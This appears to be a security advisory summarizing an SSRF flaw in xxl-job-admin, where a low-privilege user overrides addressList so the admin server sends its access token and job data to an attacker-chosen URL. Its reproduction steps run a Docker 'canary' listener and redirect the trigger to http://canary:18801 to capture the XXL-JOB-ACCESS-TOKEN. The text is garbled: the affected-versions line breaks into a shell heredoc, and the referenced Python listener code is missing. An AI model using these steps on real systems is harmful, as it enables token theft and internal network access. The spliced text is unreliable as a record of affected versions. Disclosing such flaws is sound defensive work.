# XXL-JOB SSRF Vulnerability Summary (Issue #3935) ## Vulnerability Overview A Server-Side Request Forgery (SSRF) vulnerability exists in the `/jobinfo/trigger` endpoint of `xxl-job-admin`. * **Trigger Conditions**: A low-privilege user (with permission to a job group) can submit arbitrary `addressList` values when manually triggering a job. * **Vulnerability Principle**: The service layer only verifies whether the user belongs to the job group, without validating whether the `addressList` belongs to that group or a trusted executor. Upon triggering, the provided `addressList` overrides the address configured for the group. The admin server then uses an HTTP client to send a `POST /run` request to the attacker-controlled URL. * **Impact**: Attackers can leverage the network position of the admin server to access internal HTTP targets, stealing the `XXL-JOB-ACCESS-TOKEN` and the `TriggerRequest` object containing job metadata. ## Scope of Impact * **Affected Versions**: xxl-job /tmp/ssrf_canary.py <<<'PY' # (Paste the Python code above here) PY root@qa2:~/src/xxl-job# docker run -d --name canary \ --network docker-xxl-job-network \ -p 18801:80 \ -v /tmp/ssrf_canary.py:/app/server.py \ python:3.10-slim \ python /app/server.py # 2. Intercept the /jobinfo/trigger request and modify the addressList parameter to the attacker-controlled address # (e.g., http://canary:18801) # 3. Observe the Canary logs to confirm receipt of the following information: # - POST /run # - Header containing XXL-JOB-ACCESS-TOKEN # - Body containing TriggerRequest JSON (including jobId, executorParams, executorHandler, logId, etc.) ```